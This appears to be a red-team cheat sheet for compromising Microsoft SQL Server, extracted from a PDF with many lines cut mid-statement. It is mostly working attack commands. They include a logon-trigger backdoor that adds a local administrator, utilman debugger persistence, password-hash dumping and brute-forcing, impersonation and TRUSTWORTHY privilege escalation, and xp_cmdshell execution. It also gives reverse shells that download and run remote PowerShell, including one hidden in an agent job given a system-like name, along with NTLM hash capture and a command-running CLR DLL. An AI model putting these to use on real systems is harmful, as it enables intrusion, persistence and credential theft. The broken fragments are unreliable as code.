Get-SQLPersistRegDebugger -FileName utilman.exe -Command 'c:\windows\system32\cmd.exe' -
Instance "<target>"
We can see the modified registry key below:

Malicious Triggers

A trigger is a kind of stored procedure that automatically executes when an event occurs in the
SQL server. There are three types of triggers that get executed based on the following SQL
 Data Definition Language: CREATE, ALTER, DROP statements.
 Data Manipulation Language: INSERT, UPDATE, DELETE statements
 Logon Triggers: Executes on a logon event.
We will focus on Logon triggers as DDL & DML triggers execute under the context of the
calling user(not necessarily sysadmin) & due to the nature of the statements, may trigger
multiple times.
Logon triggers are used to prevent users from logging into SQL Server under defined
conditions. For instance, preventing users from logging in after-hours or establishing concurrent
sessions. As a result, our trigger would get executed when a specified blocked account attempts
to log in.

To abuse this we create a low-privileged backdoor SQL login and configure a logon trigger
that binds to this account. Then simply attempting to log in with this account can execute
whatever SQL query or operating system command we want.

#Create a backdoor SQL login account

CREATE LOGIN [backdoor_user] WITH PASSWORD = 'Passw0rd1!';

#Create trigger
CREATE Trigger [sneaky_trigger]
IF ORIGINAL_LOGIN() = 'backdoor_user'
EXEC master..xp_cmdshell 'net user backdoor Passw0rd1! /add';
EXEC master..xp_cmdshell 'net localgroup administrators backdoor /add';

#View all triggers

SELECT * FROM sys.server_triggers

#View DDL & Logon triggers with the definition:

SELECT name,
OBJECT_DEFINITION(OBJECT_ID) as trigger_definition,
FROM sys.server_triggers WHERE
OBJECT_DEFINITION(OBJECT_ID) LIKE '%sp_addsrvrolemember%'

DROP TRIGGER [sneaky_trigger] on all server
You may like to note that this generates the following error event:

To know more about how to detect this technique, refer NetSPI's blog.

 SQL Server misconfigurations are very common and serve excellent targets
during Red Teams & Penetration Tests.
 PowerUpSQL is very resourceful for auditing & pen-testing activities.
 Cheatsheets
If you're hungry for more and you'd like to see how an SQLi could lead to complete Domain
compromise, check out Improsec's blog post!
 Red Team
 SQL Server
 Penetration Testing

Microsoft SQL Server

TCP: 1433 and UDP: 1434
Lab Setup

 https://www.hackingarticles.in/penetration-testing-lab-setupms-sql/
 To Install SQL Server PowerShell module : Install-Module -Name SqlServer -
RequiredVersion 21.1.18245
 Or Manually download from here

Cheatsheet :

 Link
 Payloadallthethings


 At a high-level the following SQL Server account types exist:

o Windows Accounts
o SQL Server Logins (Inside SQL Server)
o Database Users (Inside SQL Server)
 Windows A/c & SQL Server logins are used for signing into the SQL Server.
 Unless you are a sysadmin, an SQL Server login has to be mapped to a database
user in order to access data.
 A database user is created seperately within the DB level.
 SQL Roles:
o Sysadmin
o Public

 https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
 https://www.darkoperator.com/blog/2009/11/27/attacking-mssql-with-
 https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-
 https://h4ms1k.github.io/Red_Team_MSSQL_Server/#
 Default Credentials : sa:<Blank>


 HeidiSQL
 PowerUpSQL :Import-Module PowerUpSQL.psd1
 Microsoft SQL Server Management Studio

SQL Server Identification

 SPN Scanning: Lists SPNs that begin with MSSQL. Not necessarily accessible.

#As an un-authenticated user - Port Scanning Techniques:

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-
sql-dump-hashes --script-args mssql.instance-
name=MSSQLSERVER -sV -p 1433 <IP>
sudo nmap -sU --script=ms-sql-info <IP>

Invoke-Portscan -StartAddress <IP-Range1> -EndAddress <IP-range2> -

ScanPort -Verbose

msf> use auxiliary/scanner/mssql/mssql_ping

Get-SQLInstanceScanUDP -Computername <IP>

#Azure Environments
DNS Dictionary attack against URLs with the format x.databases.windows.net
OSINT for connection strings, config files on public repositories.
#As a Domain user:
#All SQL Instances in the Domain

sqlcmd /L

#Check accessibility as current user

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
#Check for Read Privileges
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

#As a Local user

Get-Service -Name MSSQL*
Get-SQLInstanceLocal | Get-SQLConnectionTest -Verbose

#Using .NET [Uses a UDP Broadcast on Port 1433]


#Extract from registry

Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server'
Enumerating Logins
#Bruteforce passwords: Nishang
Invoke-BruteForce -UserList C:\dict\users.txt -PasswordList C:\dict\
passwords.txt -Service SQL –Verbose


msf> use auxiliary/scanner/mssql/mssql_login

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Username <user> -

Password <pass>

mssqlclient.py -p 1433 Username@Domain_name -windows-auth

sqsh -S -U sa -P Password

#MITM Attacks
Database Enumeration
#Extract all logins from DB. Note this will show only a subset of logins.
SELECT * FROM sys.server_principals WHERE type_desc != 'SERVER_ROLE'
SELECT name FROM sys.syslogins
SELECT name from sys.server_principals

#List all DB users

select name as username from sys.database_principals

#List all DB users for current DB

SELECT * FROM sys.database_principals WHERE type_desc != 'DATABASE_ROLE'

#Blind SQL Server Login & Domain A/c enumeration using suser_name()
#suser_name() returns the principal name for a given principal ID. eg:
Get-SQLFuzzServerLogin -Instance <Computer\Instance>
Get-SQLFuzzDomainAccount -Instance <Computer\Instance>

#Get Domain Group Members through SQL Server Queries

SELECT DEFAULT_DOMAIN() as mydomain #Get Domain Name

use admin/mssql/mssql_sql
set action "select @@version"

Invoke-Sqlcmd -Query "<Query"> -ServerInstance <Instance>

Get-SQLQuery -Query "<Query>" -Instance <Instance>

#List all databases

SELECT name FROM master..sysdatabases

#Current database
SELECT db_name()

#List tables from current DB


#List content from a table

use <DBname>;select * from dbo.<table>

#List DB users and their role

select rp.name as database_role, mp.name as database_user from
sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id =
join sys.database_principals mp on (drm.member_principal_id =

#Current Server Login Name

#Current Database User

#Enumerate privileges

#Effective Permissions for the server

SELECT * FROM fn_my_permissions(NULL, 'SERVER');
#Effective Permissions for the database
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
#Active user token
SELECT * FROM sys.user_token
#Active login token
SELECT * FROM sys.login_token

Extracting Passwords
#SQL Login Password Hashes
Get-SQLServerPasswordHash -Verbose -Instance <Instance>

#SA user's hash

SELECT sys.fn_varbintohexstr(password_hash) FROM sys.sql_logins Where name
= 'username'

select name,password_hash from sys.sql_logins where name='sa'

select password_hash from sys.sql_logins where name in ('sa')

#VarCHAR convert
Select CONVERT (varchar(514), (LOGINPROPERTY('sa', 'PasswordHash') ), 1)
Automated Audit
#Automted Enum - Current Privs
Invoke-SQLDumpInfo -Verbose -Instance '<Instance>'

#Check for common high impact vulnerabilities and weak configurations

using the current login’s privileges.
Invoke-SQLAudit -Verbose -Instance '<Instance>'

 EXECUTE AS statement allows you to switch the execution context of a statement
by impersonating another login or database user.
 Execution context is reverted to the original caller only after execution of the
procedure or when a REVERT statement is issued.
 This permission is implied for sysadmin for all databases, and db_owner role
members in databases that they own.
 Always check for impersonation chains. For example, User A can impersonate
User B. User B can impersonate 'sa'.
 When you run xp_cmdshell while impersonating a user all of the commands are
still executed as the SQL Server service account, NOT the SQL Server login or
impersonated domain user.
 If you have the rights to impersonate a db_owner you may be able to escalate to
a syadmin leveraging the Trustworthy misconfiguration.
 Resources: https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-

#Find SQL Server logins which can be impersonated in the current database
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN
sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE
a.permission_name = 'IMPERSONATE'

#Impersonate DB logins. Get a list of logins

SELECT * FROM master.sys.sysusers WHERE islogin = 1

#Impersonate the server level permissions of a login.

EXECUTE AS LOGIN = 'loginName';
#Impersonate the database level permissions of a specific user in a DB.
EXECUTE AS USER = 'userName';
#Current SQL Login user
#Original SQL Login user

#Check for Sysadmin role


#PowerUpSQL. [Does not work for chained impersonations]

Invoke-SQLAuditPrivImpersonateLogin -Username sqluser -Password Sql@123 -
Instance <Instancename> -Verbose

Import-Module .\Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance -SqlUser
myuser1 -SqlPass MyPassword!


msf> use admin/mssql/mssql_escalate_execute_as #If the user has

IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to
Trustworthy Database

 The “sa” account is the database owner (DBO) of the “target” database.
 With db_owner role [Admin privileges in the database] we can create a stored
procedure that can EXECUTE AS OWNER
 Executed stored procedure adds the user to the sys admin role!


 The database property (is_trustworthy_on)is used to indicate whether a SQL

Server instance trusts a database and its contents. The property is turned off by
default as a security measure. Only a sysadmin can set a database to be
 When TRUSTWORTHY is off, impersonated users (by using EXECUTE AS) will only
have database-scope permissions but when TRUSTWORTHY is turned on
impersonated users can perform actions with server level permissions. In a
nutshell that means the trusted databases can access external resources like
network shares, email functions, and objects in other databases.
 This isn’t always bad, but when sysadmins create trusted databases and don’t
change the owner to a lower privileged user the risks start to become noticeable.
 This allows writing procedures that can execute code which uses server level
permission. If the TRUSTWORTHY setting is set to ON, and if a sysadmin DB role
(not necessarily sa) is owner of the database, it is possible for a user with
db_owner to elevate privileges to sysadmin.
 Resource:
o https://sqlity.net/en/1653/the-trustworthy-database-property-explained-
o https://github.com/sekirkity/SeeCLRly/blob/master/SeeCLRly.ps1
o NetSPI : Blog

#Enumerate TRUSTWORTHY database

SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner,
is_trustworthy_on AS TRUSTWORTHY from sys.databases


#Look for db_owner role within a DB.

use <database>

SELECT DP1.name AS DatabaseRoleName,

isnull (DP2.name, 'No members') AS DatabaseUserName FROM
sys.database_role_members AS DRM
RIGHT OUTER JOIN sys.database_principals AS DP1 ON DRM.role_principal_id =
LEFT OUTER JOIN sys.database_principals AS DP2 ON DRM.member_principal_id
= DP2.principal_id
WHERE DP1.type = 'R' ORDER BY DP1.name;
#Create a stored procedure to add User1 to sysadmin role
USE <DB-Name>
CREATE PROCEDURE sp_elevate_me
EXEC sp_addsrvrolemember 'User1','sysadmin'

USE <DB-Name>
EXEC sp_elevate_me
SELECT is_srvrolemember('sysadmin')

#View stored procedures

USE <Stored-Procedure>;
EXEC sp_helptext '<Stored-procedure>';

#Delete Stored Procedure

DROP PROCEDURE <stored procedure name>;

SELECT system_user

Invoke-SQLAuditPrivTrustworthy -Instance ops-sqlsrvone -Verbose

#List owner of the Database:

SELECT suser_sname(owner_sid) FROM sys.databases where name = '<DB_NAME>'

OS Command Execution
 With sysadmin privileges on a SQL Server, it is possible to execute OS level
commands on the server as:
o SQL Server service account in almost all cases when running as:
 Local user, local admin, SYSTEM, Network service, Local managed
service account.
 Domain user, domain admin, domain managed service account.
o Agent service account for agent jobs.

Built-in extended stored procedure xp_cmdshell

 Well known and typically disabled on a production system.

 Monitored by Blue teams.

Enabling xp_cmdshell

 Requires sysadmin privileges:

Invoke-SQLOSCmdExec -Instance <Instance-name> -Command whoami

#Enable on all SQL servers

Get-SQLInstanceDomain | Invoke-SQLOSCmd -Verbose -Command "whoami" -
Threads 5

#SQLServer Powershell Module

Invoke-SQLCmd -ServerInstance <Instance> -Query "exec master..xp_cmdshell

msf> use admin/mssql/mssql_exec

#Uploads and execute a payload
msf> use exploit/windows/mssql/mssql_payload
Manual Method
 reconfigure
 EXEC SP_CONFIGURE 'xp_cmdshell', 1
 reconfigure
 go

#Using Invoke-SQLCmd
Invoke-SQLCmd -ServerInstance UFC-DBPROD.us.funcorp.local -Query ""<Add
the below queries here>"
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure 'xp_cmdshell', 1;

#Enable xp_cmdshell via SQL Links if RPCout is enabled

EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;')

#If xp_cmdshell is uninstalled

sp_addextendedproc 'xp_cmdshell','xplog70.dll

EXEC master..xp_cmdshell 'whoami'

EXEC xp_cmdshell 'whoami'

#Reverse shell
msf exploit(multi/script/web_delivery) > set target 3
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste shell text here"

EXEC xp_cmdshell 'echo IEX(iwr <URL.ps1> -UseBasicParsing) | powershell -


#Enable RDP through SQLServer

xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

Execute-Command-MSSQL -ComputerName opssqlsrvone.OffensivePS.com -UserName
sa -Password Password1
Invoke-SQLOSCmd -Username sa -Password Password1 -Instance ops-
mssql.offensiveps.com –Command whoami
#Run query across all nodes
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec
master..xp_cmdshell 'whoami'"

#Concise output
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec
master..xp_cmdshell 'whoami'" | ft
Database Links

 A database link allows a SQL Server to access external data sources like other SQL
Servers and OLE DB data sources.
 SQL Server links can be configured to work in two ways. Using the current user
A/c or by using hard-coded credentials. If in the case of hard-coded credentials,
members of the public role are able to query linked DBs using OpenQuery.
 In case of database links between SQL servers, that is, linked SQL servers it is
possible to execute stored procedures.
 Database links work even across forest trusts.
 If RPCout is enabled (disabled by default), xp_cmdshell can be enabled.

Enumerating Database Links

 Cheatsheet:https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-

#Check for presence of 1

Get-SQLServerLink -Instance dcorp-mssql -Verbose

#List All Links

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

#Reverse shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "xp_cmdshell 'IEX(iwr
''<URL>'' -UseBasicParsing)'"

msf> use exploit/windows/mssql/mssql_linkcrawler

UNC Path Injection
 Cheatsheet:
 Article:https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-

UNC paths are used to access remote file servers under the context of the SQL Server
service A/c.
The stored procedures xp_dirtree and xp_fileexist accept file paths. If we can point these
to our Capture Server, we can extract the Service A/c's password hash and crack/relay it.
Hence the public role has direct access to the SQL Server service account's NetNTLM
password hash, by default.

 xp_dirtree '\\\'
 xp_fileexist '\\\'


#PowerUPSQL + Loaded Inveigh

Import-Module .\PowerUpSQL.psd1
Import-Module Inveigh.ps1
Import-Module Get-SQLServiceAccountsPwHashes.ps1
Get-SQLServiceAccountPwHashes -Verbose -Timeout 20 -CaptureIP <Attacker
Creation of custom stored procedures

 Replicate the functionality of xp_cmdshell.

 Requires writing a file to the disk of the victim SQL server, a “noisy” tactic that
could potentially alert an experienced blue team.

Create-SQLFileXpDll -OutFile C:\fileserver\xp_calc.dll -Command "calc.exe"
-ExportName xp_calc
Get-SQLQuery -UserName sa -Password Password1 –Instance opssqlsrvone –
Query "sp_addextendedproc 'xp_calc', '\\\fileserver\
Get-SQLQuery -UserName sa -Password Password1 –Instance ops-sqlsrvone –
Query "EXEC xp_calc"

#List existing Extended stored procedures

Get-SQLStoredProcedureXP -Instance ops-sqlsrvone -Verbose
Common Language Runtime (CLR) Assemblies

 https://blog.netspi.com/attacking-sql-server-clr-assemblies/
 .NET DLL (or group of DLLs) that can be imported into SQL Server. Once
imported, the DLL methods can be linked to stored procedures and executed via
 Loads a Dot Net assembly directly into the memory of a SQL Server, without
touching the disk.
 Pre-requisites:
o Must have the sysadmin privilege in order to enable CLR stored
o The database upon which the technique is executed must have the
TRUSTWORTHY property set the TRUE. The built-in database “msdb”
has this set by default, and thus is used by the cmdlets.
 Reference: http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-


 Compile a .Net DLL

 Login to SQL server with required privs(sysadmin)
 Configure the SQL server to meet minimum requirements.
 Create Assembly from file or hexadecimal string.
o Assembly is stored in a SQL server table.
 Create Procedure that maps to CLR methods.
 Run the procedure.

SeeCLRly is a PowerShell module that consists of the following cmdlets:

 New-CLRProcedure – This cmdlet enables CLR stored procedures on the SQL
Server, reconfigures it, loads the Dot Net assembly into memory, then creates a
stored procedure from the loaded assembly.
 Invoke-CmdExec – This cmdlet passes a specified command to the previously
created stored procedure, where it is then executed.

Make a Custom CLR DLL

#Save as cmd_exec.cs

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;

public partial class StoredProcedures

public static void cmd_exec (SqlString execCommand)
Process proc = new Process();
proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
proc.StartInfo.Arguments = string.Format(@" /C {0}",
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;

// Create the record and specify the metadata for the columns.
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output",
SqlDbType.NVarChar, 4000));

// Mark the beginning of the result set.


// Set values for each column in the row

record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());

// Send the row back to the client.


// Mark the end of the result set.



#Get Compiler location [csc.exe]

Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" |
Sort-Object fullname -Descending | Select-Object fullname -First 1 -
ExpandProperty fullname
#Compile .css to .dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library

#Register your DLL and link it to a stored procedure so the cmd_exec

method can be executed via TSQL.
#Select the msdb database
use msdb
#Enable show advanced options on the server
sp_configure 'show advanced options',1
#Enable CLR on the server
sp_configure 'clr enabled',1

#Import the assembly

FROM 'c:\temp\cmd_exec.dll'
#Link the assembly to a stored procedure
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL
NAME [my_assembly].[StoredProcedures].[cmd_exec];

#Execute commands via the “cmd_exec” stored procedure in the “msdb” DB.
cmd_exec 'whoami'

DROP ASSEMBLY my_assembly
Convert CLR DLL into a Hexadecimal String and Import It [Does not touch disk]
You don’t have to reference a physical DLL when importing CLR assemblies into SQL
Server. “CREATE ASSEMBLY” will also accept a hexadecimal string representation of a
CLR DLL file.

 Create a CLR DLL on Attacker machine. Save to c:\temp\cmd_exec.dll

 Save below code as script.ps1
 Execute below code in powershell: .\script.ps1
o Converts .dll into hexadecimal string.
o c:\temp\cmd_exec.txt file should contain the TSQL commands.
o Execute on target to get code execution : cmd_exec 'whoami'

# Target file
$assemblyFile = "c:\temp\cmd_exec.dll"

# Build top of TSQL CREATE ASSEMBLY statement

$stringBuilder = New-Object -Type System.Text.StringBuilder
$stringBuilder.Append("CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo]
FROM `n0x") | Out-Null

# Read bytes from file

$fileStream = [IO.File]::OpenRead($assemblyFile)
while (($byte = $fileStream.ReadByte()) -gt -1) {
$stringBuilder.Append($byte.ToString("X2")) | Out-Null

# Build bottom of TSQL CREATE ASSEMBLY statement

$stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Build create procedure command

$stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[cmd_exec] @execCommand
NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].
[cmd_exec];") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Create run os command

$stringBuilder.AppendLine("EXEC[dbo].[cmd_exec] 'whoami'") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Create file containing all commands

$stringBuilder.ToString() -join "" | Out-File c:\temp\cmd_exec.txt
Automated Approach

#Create custom .NET DLL with custom Attributes

Create-SQLFileCLRDll -ProcedureName “runcmd” -OutFile runcmd -OutDir c:\
Creates: C# File: runcmd.csc, CLR DLL: runcmd.dll, SQL Cmd: runcmd.txt

#Execute OS commands via CLR


#List Existing CLR Assemblies

Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -
Username sa -Password 'sapassword!' | Out-GridView

#Execute on remote servers. Requires privs.

Get-SQLInstanceDomain -Verbose | Get-SQLStoredProcedureCLR -Verbose -
Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'sapassword!' |
Format-Table -AutoSize

import-module SeeCLRly.ps1
Add-CLRProcedure -Server MSSQL
Invoke-CmdExec -Server MSSQL -Command "mkdir c:\temp"
List Existing CLR Assemblies and CLR Stored Procedures
USE msdb;
SELECT SCHEMA_NAME(so.[schema_id]) AS [schema_name],
af.name + '.dll' as [file_name],
asmbly.name AS [assembly_name],
so.object_id as [sp_object_id],
so.name AS [sp_name],
so.[type] as [sp_type],
FROM sys.assembly_modules am
INNER JOIN sys.assemblies asmbly
ON asmbly.assembly_id = am.assembly_id
INNER JOIN sys.assembly_files af
ON asmbly.assembly_id = af.assembly_id
INNER JOIN sys.objects so
ON so.[object_id] = am.[object_id]
Export a CLR Assembly that Exists in SQL Server to a DLL

 Enumerate for API keys, server references, credentials, etc.

 Can be used as a backdoor technique if stored procedure can be modified and
stored on the server.

#Export existing assemblies.

Get-SQLStoredProcedureCLR -ExportFolder c:\Temp

#Export to file
Get-SQLInstanceDomain -Verbose | Get-SQLStoredProcedureCLR -Verbose -
Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'sapassword!' -
ExportFolder c:\temp | Format-Table -AutoSize
 Modify a CLR DLL using dnSpy. Recompile.
o Ref:https://blog.netspi.com/attacking-sql-server-clr-assemblies/

Ole Automation Procedures

 Casestudy:https://malwaremusings.com/2013/04/10/a-look-at-some-ms-sql-
 OLE is Object Linking and Embedding
 SQL Server native scripting that allows calls to COM objects.
 Requires sysadmin role by default
 Can be executed by non-sysadmin with:
o GRANT EXECUTE ON OBJECT::[dbo].[sp_OACreate] to [public]
o GRANT EXECUTE ON OBJECT::[dbo].[sp_OAMethod] to [public]
 Execute privileges on sp_OACreate and sp_OAMethod can also be used for


 Server level setting: “'Ole Automation Procedures” set to 1

#Enable OLE Automation

sp_configure 'show advanced options', 1;
sp_configure 'Ole Automation Procedures', 1;

#Execute command
DECLARE @ProgramToRun VARCHAR(255)
SET @ProgramToRun = 'Run("calc.exe")'
EXEC sp_oacreate 'wScript.Shell', @output out
EXEC sp_oamethod @output, @ProgramToRun
EXEC sp_oadestroy @output
Invoke-SQLOSCmdCLR -Username sa -Password Password1 -Instance ops-
sqlsrvone –Command "powershell –e <base64encodedscript>" -Verbose
Agent Jobs

 https://docs.microsoft.com/en-us/sql/ssms/agent/sql-server-agent?view=sql-
 Reverse-shell Article : https://www.optiv.com/explore-optiv-insights/blog/mssql-

SQL Server Agents

 Windows service that executes scheduled tasks or jobs.

 The agent jobs can be scheduled, and run under the context of the MSSQL Server
Agent service. However, using agent proxy capabilities, the jobs can be run with
different credentials as well.
 Pre-requisites:
o MSSQL Server Agent service needs to be running.
o Requires sysadmin role by default.
o Non-sysadmin roles: SQLAgentUserRole, SQLAgentReaderRole, and
SQLAgentOperatorRole fixed database roles in the msdb database can
also be used.
 Subsystems • Interesting subsystems (job types): – Microsoft ActiveX Script
(VBScript and Jscript) – CmdExec – PowerShell – SSIS (SQL Server Integrated

List all jobs

 Enumerate job names, and create similar names to avoid being detected.

job.job_id, notify_level_email, name, enabled,
description, step_name, command, server, database_name
msdb.dbo.sysjobs job
msdb.dbo.sysjobsteps steps
job.job_id = steps.job_id

Get-SQLAgentJob -Instance ops-sqlsrvone -username sa -Password Pass@123 -
Creating a Job

 Start the SQL Server Agent service (xp_startservice)

 Create Job (sp_add_job) A
 dd job step (sp_add_jobstep)
 Run Job (sp_start_job )
 Delete Job (sp_delete_job)


USE msdb
EXEC dbo.sp_add_job @job_name = N'syspolicy_purge_history'
EXEC sp_add_jobstep @job_name = N'syspolicy_purge_history', @step_name =
N'test_powershell_name1', @subsystem = N'PowerShell', @command =
N'powershell.exe -e <encoded cmd>', @retry_attempts = 1, @retry_interval =
EXEC dbo.sp_add_jobserver @job_name = N'syspolicy_purge_history'
EXEC dbo.sp_start_job N'syspolicy_purge_history'
#EXEC dbo.sp_delete_job @job_name = N'syspolicy_purge_history'

#Reverse shell
USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ;
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name =
N'test_powershell_name1', @subsystem = N'PowerShell', @command =
N'powershell.exe -nop -w hidden -c "IEX ((new-object
@retry_attempts = 1, @retry_interval = 5 ;
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';

USE msdb
EXEC dbo.sp_add_job @job_name = N'cmdjob'
EXEC sp_add_jobstep @job_name = N'cmdjob', @step_name = N'test_cmd_name1',
@subsystem = N'cmdexec', @command = N'cmd.exe /k calc', @retry_attempts =
1, @retry_interval = 5
EXEC dbo.sp_add_jobserver @job_name = N'cmdjob'
EXEC dbo.sp_start_job N'cmdjob';
#EXEC dbo.sp_delete_job @job_name = N'cmdJob'

Invoke-SQLOSCmdAgentJob –Subsystem PowerShell -Username sa -Password
Password1 -Instance ops-sqlsrvone –Command "powershell –e
<b64encodedscript>" -Verbose –Subsystem <CmdExec/VBScript/Jscript>
Shared Service Accounts

 OS Commands executed inside SQL Server run in the context of the SQL Server
service A/c
 SQL Server service accounts have sysadmin privileges by default.
 Organizations usually utilize a single domain account to run many SQL Servers.
 If we compromise a single SQL Service account, we will also have compromised
all SQL servers using that shared A/c. This means sysadmin access to those
databases and possibly administrative access to the underlying OS since SQL
services usually run with local administrator privileges.


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